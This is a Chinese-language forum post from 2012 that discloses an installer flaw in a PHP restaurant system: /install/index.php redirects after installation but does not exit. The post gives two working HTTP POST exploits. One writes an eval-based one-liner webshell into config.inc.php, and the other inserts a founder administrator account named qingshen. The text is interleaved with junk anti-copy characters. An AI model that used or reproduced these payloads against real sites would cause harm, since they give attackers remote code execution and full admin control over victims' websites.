问题出在/install/index.php文件。在程序安装完后,会在程序根目录下生成install.lock文件。而/install/index.php在判断是否有install.lock时出现错误。
* @/ s# O+ m* u4 G7 h, [$ C- @9 A
; T2 {* t2 `5 Q' L4 i" X0 M<?php1 s0 W6 _; \2 j9 K- g
if(file_exists("../install.lock"))
/ w6 |" b& T1 Z" y& y{
l a! Q2 e- J9 r' W4 Y2 R& I header("Location: ../");//没有退出6 |6 V7 y8 i! u- @
}. H% j$ Z; M& B5 E8 j+ ~
) o7 x; q( x* u; s$ a2 Q//echo 'tst';exit;
/ P' ]+ x7 i! Erequire_once("init.php");
% P% [ k" `1 \if(empty($_REQUEST['step']) || $_REQUEST['step']==1)
; [5 g* a% S' B$ o. w o{! w4 x/ N5 [* \) Z$ L" A4 s
可见在/install/index.php存在时,只是header做了302重定向并没有退出,也就是说下面的逻辑还是会执行的。在这里至少可以产生两个漏洞。. Q* w. |1 C3 ^* R% U! v
6 O- a! I I" t: b2 h! c9 A" J
1、getshell(很危险)
" N" c* }1 ^: I" v" yif(empty($_REQUEST['step']) || $_REQUEST['step']==1)8 _. G* \! F2 W0 x9 @9 k
{, l0 [5 D) x- {% w- \1 x* G$ {
$smarty->assign("step",1);2 b1 e/ k" U P: A* Q% U U
$smarty->display("index.html");' A6 T/ j3 ^8 d& V. ?+ P
}elseif($_REQUEST['step']==2)1 Z$ i* M$ V! }# ^6 U, r1 Y- c
{( F$ L. b; x) W3 i0 i
$mysql_host=trim($_POST['mysql_host']);) G `. ^ j' ~7 d+ g, s9 G5 l4 x
$mysql_user=trim($_POST['mysql_user']);$ A" {* Z5 u K( R$ n2 r- w
$mysql_pwd=trim($_POST['mysql_pwd']);& {( k& `% H% Z6 g
$mysql_db=trim($_POST['mysql_db']);, S- u; }5 \1 H2 Z
$tblpre=trim($_POST['tblpre']);
( F! T2 }$ @4 b- z2 o( f $domain==trim($_POST['domain']);
' H- W% T7 ?) K9 r, S! v$ C $str="<?php \r\n";
- m: }* { h" q* c* b. q( S $str.='define("MYSQL_HOST","'.$mysql_host.'");'."\r\n";4 X0 n+ b, c: p9 K* I
$str.='define("MYSQL_USER","'.$mysql_user.'");'."\r\n";
. M" [2 A: @: ?4 _9 J( T $str.='define("MYSQL_PWD","'.$mysql_pwd.'");'."\r\n";: a" e/ u( L I; z: E+ u2 N( d
$str.='define("MYSQL_DB","'.$mysql_db.'");'."\r\n";" [+ f# |& P9 h2 _ z3 u/ X
$str.='define("MYSQL_CHARSET","GBK");'."\r\n";, \& W# ~/ [, Z) B2 A% F
$str.='define("TABLE_PRE","'.$tblpre.'");'."\r\n";
7 Q& ]) Q* b2 F $str.='define("DOMAIN","'.$domain.'");'."\r\n";' ^% Y, v& Y# v4 g/ A7 q
$str.='define("SKINS","default");'."\r\n";% m" `( p5 A! R& \2 g i0 d1 m
$str.='?>';# s2 I& k7 \" [' ^# a
file_put_contents("../config/config.inc.php",$str);//将提交的数据写入php文件
" R; E5 C3 t/ a上面的代码将POST的数据直接写入了../config/config.inc.php文件,那么我们提交如下POST包,即可获得一句话木马
" L5 ?" U9 W- dPOST /canting/install/index.php?m=index&step=2 HTTP/1.1
$ Q6 [* Y, A1 I7 L( z* f6 _Host: 192.168.80.129
4 a& v2 n6 X6 ^, h q6 L' wUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0
8 \( B; P. M5 R. [& `2 AAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
. i1 Q2 w" H, c. u {Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
+ `( k3 k, H- c& r$ Q8 w3 pAccept-Encoding: gzip, deflate
. h- z* L* |' n4 JReferer: http://192.168.80.129/canting/install/index.php?step=1+ @8 i/ M6 b7 Z) ?
Cookie: ck_ss_id=1354023211djfa6ggefdifvoa3kvhi61sc42; PHPSESSID=djfa6ggefdifvoa3kvhi61sc42
- L7 G( @6 G8 Z" nContent-Type: application/x-www-form-urlencoded; B9 [- B) P# |2 C+ _
Content-Length: 126. w! `8 K; o5 a1 b7 a! n- p( O" e
5 [5 g+ A4 S; \mysql_host=test");@eval($_POST[x]);?>//&mysql_user=1&mysql_pwd=2&mysql_db=3&tblpre=koufu_&domain=www&button=%CF%C2%D2%BB%B2%BD
' a) e9 C. y$ e" n% F但是这个方法很危险,将导致网站无法运行。
3 g$ p- j1 X$ {& ^3 ?4 E8 h( g4 @" Z( [" F" Q S
2、直接添加管理员
4 ?6 z0 h; @: v; H8 ?; P' N! }7 e9 g# R; Y
elseif($_REQUEST['step']==5)0 R1 }$ J+ J" l6 \1 Z! }
{
1 z f+ T$ a! l, Z! f if($_POST)
& t; r* Y% s; m9 b9 Q { require_once("../config/config.inc.php");4 C# J8 O9 h# ?/ r! l% N: @, Z `) q$ d' Q
$link=mysql_connect(MYSQL_HOST,MYSQL_USER,MYSQL_PWD);
$ x9 I' }( ~/ n( a mysql_select_db(MYSQL_DB,$link);8 A3 E9 t! [2 W+ {) o! y
mysql_query("SET NAMES ".MYSQL_CHARSET );
9 L" U; `, x# t9 W mysql_query("SET sql_mode=''");2 C, }6 ~2 w Z. ?& }0 O& j
7 B9 J: D. C: p- n( i: _ $adminname=trim($_POST['adminname']);; J+ m6 b8 D7 ~$ E, x. C, P: T9 U3 w
$pwd1=trim($_POST['pwd1']);. z* [& n0 b `5 A6 o$ v
$pwd2=trim($_POST['pwd2']);
# _) Q: |* ~" g% H8 Y* A4 x if(empty($adminname))
2 f' F5 x4 k1 |( Z1 I4 j {
, Z: K. w) }* A- S# S5 b- D
$ r% W* j' k% x, d. } echo "<script>alert('管理员不能为空');history.go(-1);</script>";
9 ^* f- a7 c0 y9 g3 v exit();
$ d8 H& W1 E' @& P0 i8 Q8 X }2 e# ~3 z" F9 |! Y7 L/ o3 S/ j
if(($pwd1!=$pwd2) or empty($pwd1))
3 ^. H; F0 o1 Z* x8 }7 E, I! |1 f {
$ t6 H( g( i8 M echo "<script>alert('两次输入的密码不一致');history.go(-1);</script>";//这里也是没有退出
9 A7 w: o7 M/ t1 c$ Z/ J+ M/ G }
" \% ^! c3 A7 p( |+ ? mysql_query("insert into ".TABLE_PRE."admin(adminname,password,isfounder) values('$adminname','".umd5($pwd1)."',1)");//直接可以插入一个管理员! _) ?5 ~' X; w" |3 X/ l
}$ i8 o: U. ?# F+ I( h: n2 J9 Z
这样的话我们就可以直接插入一个qingshen/qingshen的管理员帐号,语句如下:( r: M8 H. z( |2 L2 N# r; V
POST /canting/install/index.php?m=index&step=5 HTTP/1.18 d$ P8 m, O* ]) G2 z
Host: 192.168.80.1296 x5 H$ J9 m+ o; |' m/ m' t: v- {( T
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.06 v0 [6 n( B3 g; a) B) h* t% K* m
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.87 E6 D5 d9 Q4 |5 o. H) K0 U* |$ q* D/ x
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.33 r0 A- q+ @( Y" i" V3 ^
Accept-Encoding: gzip, deflate! I" |+ r. ^2 A
Referer: http://www.2cto.com /canting/install/index.php?step=1/ }* L- \) x% l, Y6 C
Cookie: ck_ss_id=1354023211djfa6ggefdifvoa3kvhi61sc42; PHPSESSID=djfa6ggefdifvoa3kvhi61sc42- r% b4 [2 x' w, `
Content-Type: application/x-www-form-urlencoded6 L4 d# t6 ?8 M4 C$ @; N
Content-Length: 466 V$ G& c/ p8 `1 S7 n! t4 Q" L0 W
! _' a# ]( i9 \# @ a. W! Z' q7 H
adminname=qingshen&pwd1=qingshen&pwd2=qingshen
/ E1 F4 ? _+ j1 o7 E |
发表于 2012-12-4 11:13:44
收藏
支持
反对